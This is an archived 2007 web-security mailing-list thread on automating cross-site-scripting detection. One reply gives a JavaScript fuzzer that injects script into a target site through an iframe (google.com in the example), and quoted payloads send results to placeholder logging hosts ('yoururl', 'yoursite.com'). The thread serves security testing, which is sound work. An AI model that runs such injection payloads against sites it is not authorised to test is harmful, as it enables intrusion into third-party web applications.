[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [WEB SECURITY] How to detect XSS in an automated fashion

Basically the idea is you fuzz the various dangerous input on a 
site e.g. ">' etc then you place a tag within your commands {log} 
which gets replaced by javascript to execute a log of the results. 
You might have to use different logging code depending on the fuzz 
data used.

Here's a simple example I wrote in a couple of minutes to explain 
my theory:-

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml";>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-
8859-1" />
<title>XSS Fuzz</title>
<script type="text/javascript">
window.onload = function() {	
	xssFuzzer.setFrame('iframe');
	xssFuzzer.setURL('http://www.google.com/search?');
	for(i=0;i<1;i++) {
		// Fuzzing code here
		xssFuzzer.setCommands('q=test{log}');
		
xssFuzzer.setLogger("<scr"+"ipt>self.location='http://yoururl/log.ph
p?results="+xssFuzzer.getResult()+"'</scr"+"ipt>");
		xssFuzzer.send();
	}
}
xssFuzzer = {frame:null,url:null,loggerCode:null,commands:null};
xssFuzzer.setCommands = function(commands) {
	this.commands = commands;
}
xssFuzzer.getResult = function() {
	var commands = this.commands.replace("{log}", '');
	return encode64(commands);
}
xssFuzzer.setFrame = function (frame) {
	this.frame = frame;
}
xssFuzzer.setURL = function(url) {
	this.url = url;
}
xssFuzzer.getLogger = function() {
	return this.loggerCode;
}
xssFuzzer.setLogger = function(loggerCode) {
	this.loggerCode = loggerCode;
}
xssFuzzer.send = function() {
	var commands = this.commands.replace("{log}", this.getLogger());	
	window.frames[this.frame].location = this.url + commands;
}
var keyStr = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
	
function encode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;

   do {
	  chr1 = input.charCodeAt(i++);
	  chr2 = input.charCodeAt(i++);
	  chr3 = input.charCodeAt(i++);

	  enc1 = chr1 >> 2;
	  enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
	  enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
	  enc4 = chr3 & 63;

	  if (isNaN(chr2)) {
		 enc3 = enc4 = 64;
	  } else if (isNaN(chr3)) {
		 enc4 = 64;
	  }

	  output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + 
		 keyStr.charAt(enc3) + keyStr.charAt(enc4);
   } while (i < input.length);
   
   return output;
}

</script>
</head>

<body>
<iframe src="" name="iframe" id="iframe"></iframe>
</body>
</html>


On Thu, 30 Aug 2007 02:42:12 +0100 gaz_sec@xxxxxxxxxxxx wrote:
>I've thought about a XSS fuzzer a bit more now, you'll have to 
>excuse me but it's 2.30am here :) Right the best way to do it in 
>my 
>opinion is:-
>
>1. Base site contains a iframe with the target site in.
>2. The base site sends XSS fuzz to the target site through 
>javascript location.
>3. The fuzzer contains javascript code to log the results back to 
>a 
>server side script. E.g. 
><script>self.location='http://yoursite.com?logresults?fuzzResult=Fu
>z
>zBaseEncoded'</script>
>
>
>On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman 
><Billy.Hoffman@xxxxxxxxxxxxxxx> wrote:
>>Of course, that only works if your web scanner has a JavaScript 
>>interpreter!
>>
>>Billy
>>
>>-----Original Message-----
>>From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx]
>>Sent: Wed 8/29/2007 3:03 PM
>>To: websecurity@xxxxxxxxxxxxx
>>Cc: travisaltman@xxxxxxxxx
>>Subject: Re: [WEB SECURITY] How to detect XSS in an automated 
>>fashion
>> 
>>Hi Travis
>>
>>I've wrote a HTML/JS Fuzzer in which I encountered the same 
>>problem. I decided to create a simple javascript callback which 
>>was 
>>executed on successful fuzz. I base encoded the result and sent 
>>the 
>>information via a normal HTML image (really a PHP script) which 
>>logged the results.
>>
>>Cheers
>>
>>Gareth
>>
>>On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman 
>><travisaltman@xxxxxxxxx> wrote:
>>>I am trying to run through a dictionary of XSS attacks (aka 
>>>fuzzing) on a
>>>web application.  What is the best way to determine, in an 
>>>automated
>>>fashion, if each attack was successful?  Would I simply review 
>>the 
>>>source
>>>code of the response to see if my attack was encoded or 
>filtered?
>>>
>>>http://travisaltman.com
>>
>>--
>>Click to reduce wrinkles, increase energy and drive - anti-aging.
>>http://tagline.hushmail.com/fc/Ioyw6h4dWDHmHiSvMyDeVPgVWtCgUCy5Ky0
>7
>>XGWad22ySq1P1RSIOW/
>>
>>
>>------------------------------------------------------------------
>-
>>---------
>>Join us on IRC: irc.freenode.net #webappsec
>>
>>Have a question? Search The Web Security Mailing List Archives: 
>>http://www.webappsec.org/lists/websecurity/
>>
>>Subscribe via RSS: 
>>http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>--
>Click to reduce wrinkles, increase energy and drive - anti-aging.
>http://tagline.hushmail.com/fc/Ioyw6h4dWDHVfywNwP9evw7ksS1ajcnZa81m
>dkZe4yQdEP7hqEvZMm/
>
>
>-------------------------------------------------------------------
>---------
>Join us on IRC: irc.freenode.net #webappsec
>
>Have a question? Search The Web Security Mailing List Archives: 
>http://www.webappsec.org/lists/websecurity/
>
>Subscribe via RSS: 
>http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

--
Click to get freedom from your annoying glasses. Save on LASIK surgery.
http://tagline.hushmail.com/fc/Ioyw6h4eJhmtqWm2yAE2UpwmL1EQmj5NT4xXHmJxMCwvzITxjOCZho/


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Brought to you by http://www.webappsec.org
Search this site